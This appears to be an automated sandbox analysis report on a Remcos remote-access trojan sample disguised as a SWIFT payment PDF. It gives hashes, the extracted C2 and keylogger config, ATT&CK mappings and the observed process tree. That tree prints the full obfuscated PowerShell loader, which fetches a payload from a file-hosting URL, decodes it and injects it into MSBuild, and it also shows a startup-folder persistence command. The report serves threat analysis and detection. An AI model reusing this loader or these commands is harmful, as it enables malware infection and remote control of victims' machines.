remcos | 167887f979c648809aa8328edba96d972b401f74b06ee5026ea073efd4d9b432

General

Target

SWIFT 103 202414111523339800 111124.pdf.vbs
Size

1KB
MD5

1571d85ecdbd26ac45e3f2639e7e4310
SHA1

b1dd5db95e88132a5052b451b757b9ce486bccc0
SHA256

167887f979c648809aa8328edba96d972b401f74b06ee5026ea073efd4d9b432
SHA512

e0d9a19616e3762c67b0f2d24a92529c3bbd26f01938768c0d213470628df97e7f2bf6aa7c0bdf60018590862e500c1ad6bb6e4b0585b4be47d1b06dd9fb4bcf

Score

10^/10

remcos nov discovery execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Extracted

Family

remcos

Botnet

NOV

C2

alpha147.ddns.net:35890

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
vlc.exe
copy_folder
vlc
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-1KOA72
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
rmc
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos
Blocklisted process makes network request 4 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

3 540 WScript.exe
5 540 WScript.exe
24 5016 powershell.exe
26 5016 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

3160 powershell.exe
1540 powershell.exe
5016 powershell.exe

flow	pid	process
3	540	WScript.exe
5	540	WScript.exe
24	5016	powershell.exe
26	5016	powershell.exe

pid	process
3160	powershell.exe
1540	powershell.exe
5016	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

Processes:

WScript.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.vbs	WScript.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 5016 set thread context of 4576 5016 powershell.exe MSBuild.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
discovery

System Language Discovery
T1614.001

Processes:

MSBuild.exe

description ioc process

Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

cmd.exePING.EXE

pid process

380 cmd.exe
4772 PING.EXE
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4772 PING.EXE

description	pid	process	target process
PID 5016 set thread context of 4576	5016	powershell.exe	MSBuild.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

pid	process
380	cmd.exe
4772	PING.EXE

pid	process
4772	PING.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	5	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

3160 powershell.exe
3160 powershell.exe
1540 powershell.exe
1540 powershell.exe
5016 powershell.exe
5016 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 3160 powershell.exe
Token: SeDebugPrivilege 1540 powershell.exe
Token: SeDebugPrivilege 5016 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

MSBuild.exe

pid process

4576 MSBuild.exe

pid	process
3160	powershell.exe
3160	powershell.exe
1540	powershell.exe
1540	powershell.exe
5016	powershell.exe
5016	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3160	powershell.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeDebugPrivilege	5016	powershell.exe

pid	process
4576	MSBuild.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

WScript.execmd.exepowershell.exepowershell.exe

description	pid	process	target process
PID 540 wrote to memory of 380	540	WScript.exe	cmd.exe
PID 540 wrote to memory of 380	540	WScript.exe	cmd.exe
PID 380 wrote to memory of 4772	380	cmd.exe	PING.EXE
PID 380 wrote to memory of 4772	380	cmd.exe	PING.EXE
PID 380 wrote to memory of 3160	380	cmd.exe	powershell.exe
PID 380 wrote to memory of 3160	380	cmd.exe	powershell.exe
PID 540 wrote to memory of 1540	540	WScript.exe	powershell.exe
PID 540 wrote to memory of 1540	540	WScript.exe	powershell.exe
PID 1540 wrote to memory of 5016	1540	powershell.exe	powershell.exe
PID 1540 wrote to memory of 5016	1540	powershell.exe	powershell.exe
PID 5016 wrote to memory of 4576	5016	powershell.exe	MSBuild.exe
PID 5016 wrote to memory of 4576	5016	powershell.exe	MSBuild.exe
PID 5016 wrote to memory of 4576	5016	powershell.exe	MSBuild.exe
PID 5016 wrote to memory of 4576	5016	powershell.exe	MSBuild.exe
PID 5016 wrote to memory of 4576	5016	powershell.exe	MSBuild.exe
PID 5016 wrote to memory of 4576	5016	powershell.exe	MSBuild.exe
PID 5016 wrote to memory of 4576	5016	powershell.exe	MSBuild.exe
PID 5016 wrote to memory of 4576	5016	powershell.exe	MSBuild.exe
PID 5016 wrote to memory of 4576	5016	powershell.exe	MSBuild.exe
PID 5016 wrote to memory of 4576	5016	powershell.exe	MSBuild.exe
PID 5016 wrote to memory of 4576	5016	powershell.exe	MSBuild.exe
PID 5016 wrote to memory of 4576	5016	powershell.exe	MSBuild.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SWIFT 103 202414111523339800 111124.pdf.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:540
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\SWIFT 103 202414111523339800 111124.pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:380
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1 -n 10
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4772
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\SWIFT 103 202414111523339800 111124.pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3160
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzVHJpbkddJFZFcmJvc0VQckVmZVJlbmNFKVsxLDNdKydYJy1qT0luJycpICggKCgnWFpsaW1hZ2VVcmwgPSA0cWpodHRwczovLzEwMTcuZmlsZScrJ21haWwuY29tL2FwaS9maWxlL2dldD9maWxlJysna2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVRLajNMQzZTUXRJY09jX1QzNXcmcGtfdicrJ2lkPWZkNGY2MTRiYjIwOWM2MicrJ2MxNzMnKycwJysnOTQ1MTc2YTA5MDRmIDRxajtYWmx3ZWJDbGllbnQgPSBOZXcnKyctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O1habGltYWdlQnl0ZXMgPSBYWmx3ZWJDbGllbnQuRG93bmxvYWREYXRhKFhabGltYWdlVXJsKTtYWmxpbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0JysncmluZyhYWmxpbWFnZUJ5dGVzKTtYWmxzdGFydEZsYWcgPSA0cWo8PEJBU0U2NF9TVEFSVD4+NHFqO1habGVuZEZsYWcgPSA0cWo8PEJBU0U2NF9FTkQ+PjRxajtYWmwnKydzdGFydEluZGUnKyd4ID0gWFpsaW1hZ2VUZXh0LkluZGV4T2YoWFpsc3RhcnRGbGFnKTtYWmxlbmRJbmRleCA9IFhabGltYWdlVGV4dC5JbmRleE9mKFhabGVuZEZsYWcpO1habHN0YXJ0SW5kZXggLWdlIDAgLWFuZCBYWmxlbmRJbmRleCcrJyAtZ3QgWFpsc3RhcnRJbmRleCcrJztYWmxzdGFydEluZGV4ICs9IFhabHN0YXJ0RmxhZy5MZW5ndGg7WFpsYmFzZTY0TGVuZ3RoID0gWFpsZW5kSScrJ25kZXggLSBYWmxzdGFydEluZGV4O1habGJhc2U2NENvbW1hbmQgPSBYWmxpbWFnZVRleHQuU3ViJysnc3RyaW5nKFhabHN0YXJ0SW5kZScrJ3gsIFhabGJhc2U2NExlbmd0aCk7WFpsYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoWFpsYmFzZTY0Q29tbWFuZC5Ub0NoYScrJ3JBcnJheSgpIHAzayBGb3JFYWNoLU9iamVjdCB7IFhabF8gfSlbLTEuLi0oWFpsYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtYWmxjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFhabGJhc2U2NFJldmVyc2VkKTtYWmxsJysnb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoWFpsY29tbWFuZEJ5dGVzKTtYWmx2YWlNZXRob2QgPSAnKydbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDRxalZBJysnSTRxaicrJyk7WFpsdmFpTWV0aG9kLkludm9rZShYWmxudWxsLCBAKDRxajAvTFI5Q2cvZC9lZS5lJysndHNhcC8vOnNwdHRoNHFqLCA0cWpkJysnZXNhdGl2YWRvNHFqLCAnKyc0cWpkZXNhdGl2YWRvNHFqLCA0cWpkZXNhdGl2YWRvNHFqLCA0cWpNU0J1aWxkNHFqLCA0cWpkZXNhdGl2YWRvNHFqLCA0cWpkZXNhdGl2YWRvNHFqLDRxamRlc2F0aXZhZG80cWosNHFqZGVzYXRpdmFkbzRxaiw0cWpkZXNhdGl2YWRvNHFqLDRxamRlc2F0aXZhZG80cWosJysnNHFqZGVzYScrJ3RpdmFkbzRxaiw0cWoxNHFqLDRxamRlc2F0aXZhZG80cWopKTsnKSAgLUNSZVBsQUNlKFtjaEFyXTg4K1tjaEFyXTkwK1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFcGxhY2UnNHFqJyxbY2hBcl0zOSAgLVJFcGxhY2UgJ3AzaycsW2NoQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1540
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([sTrinG]$VErbosEPrEfeRencE)[1,3]+'X'-jOIn'') ( (('XZlimageUrl = 4qjhttps://1017.file'+'mail.com/api/file/get?file'+'key=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_v'+'id=fd4f614bb209c62'+'c173'+'0'+'945176a0904f 4qj;XZlwebClient = New'+'-Object System.Net.WebClient;XZlimageBytes = XZlwebClient.DownloadData(XZlimageUrl);XZlimageText = [System.T'+'ext.Encoding]::UTF8.GetSt'+'ring(XZlimageBytes);XZlstartFlag = 4qj<<BASE64_START>>4qj;XZlendFlag = 4qj<<BASE64_END>>4qj;XZl'+'startInde'+'x = XZlimageText.IndexOf(XZlstartFlag);XZlendIndex = XZlimageText.IndexOf(XZlendFlag);XZlstartIndex -ge 0 -and XZlendIndex'+' -gt XZlstartIndex'+';XZlstartIndex += XZlstartFlag.Length;XZlbase64Length = XZlendI'+'ndex - XZlstartIndex;XZlbase64Command = XZlimageText.Sub'+'string(XZlstartInde'+'x, XZlbase64Length);XZlbase64Reversed = -join (XZlbase64Command.ToCha'+'rArray() p3k ForEach-Object { XZl_ })[-1..-(XZlbase64Command.Length)];XZlcommandBytes = [System.Convert]::FromBase64String(XZlbase64Reversed);XZll'+'oadedAssembly = [System.Reflection.Assembly]::Load(XZlcommandBytes);XZlvaiMethod = '+'[dnlib.IO.Home].GetMethod(4qjVA'+'I4qj'+');XZlvaiMethod.Invoke(XZlnull, @(4qj0/LR9Cg/d/ee.e'+'tsap//:sptth4qj, 4qjd'+'esativado4qj, '+'4qjdesativado4qj, 4qjdesativado4qj, 4qjMSBuild4qj, 4qjdesativado4qj, 4qjdesativado4qj,4qjdesativado4qj,4qjdesativado4qj,4qjdesativado4qj,4qjdesativado4qj,'+'4qjdesa'+'tivado4qj,4qj14qj,4qjdesativado4qj));') -CRePlACe([chAr]88+[chAr]90+[chAr]108),[chAr]36 -REplace'4qj',[chAr]39 -REplace 'p3k',[chAr]124) )"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5016
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:4576

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

Remote System Discovery

1

T1018

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
2d6f9fceed7a10b3219d6879d98ef62d

SHA1
df3a8ec20428cdf59034cd3678cb9dd2da434cc7

SHA256
67cbf26753a0778058d88eaa0268843f475220ebf13a8a55b30ec66de6d0e143

SHA512
dfbb711a2fcc109366964a4220ee22e401dcfdc5b0f1280340c10c19f7fe6ed20fc6f157385e994925e63c16118e150bdc4f6fd93042e0488aeb7dbf35531b9d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
6f81983c4a8766167637c8761fee8725

SHA1
959819193ab0e21d47bf043742cc73a1b45cb301

SHA256
1ebba42d1c9128df7dcde53349979935de0074927b7504fe2e4b6e6d79c1b50a

SHA512
66f4e10a0798fd1762a9c3d672c23b6cb4e4ed79dd891027aafc6a1779098cb65af8c770985773ff073a1de7b331bf78518803fd7e99a63f59958e9d3ac85537

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5paruc22.v3w.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3160-17-0x00007FFE57DA0000-0x00007FFE58861000-memory.dmp

Filesize
10.8MB

Download
memory/3160-12-0x00007FFE57DA0000-0x00007FFE58861000-memory.dmp

Filesize
10.8MB

Download
memory/3160-14-0x00007FFE57DA0000-0x00007FFE58861000-memory.dmp

Filesize
10.8MB

Download
memory/3160-13-0x00007FFE57DA0000-0x00007FFE58861000-memory.dmp

Filesize
10.8MB

Download
memory/3160-2-0x000001E05F860000-0x000001E05F882000-memory.dmp

Filesize
136KB

Download
memory/3160-1-0x00007FFE57DA3000-0x00007FFE57DA5000-memory.dmp

Filesize
8KB

Download
memory/4576-49-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4576-51-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4576-44-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4576-47-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4576-48-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4576-39-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4576-50-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4576-41-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4576-85-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4576-60-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4576-61-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4576-68-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4576-69-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4576-84-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/5016-38-0x0000024DDFC40000-0x0000024DDFD98000-memory.dmp

Filesize
1.3MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads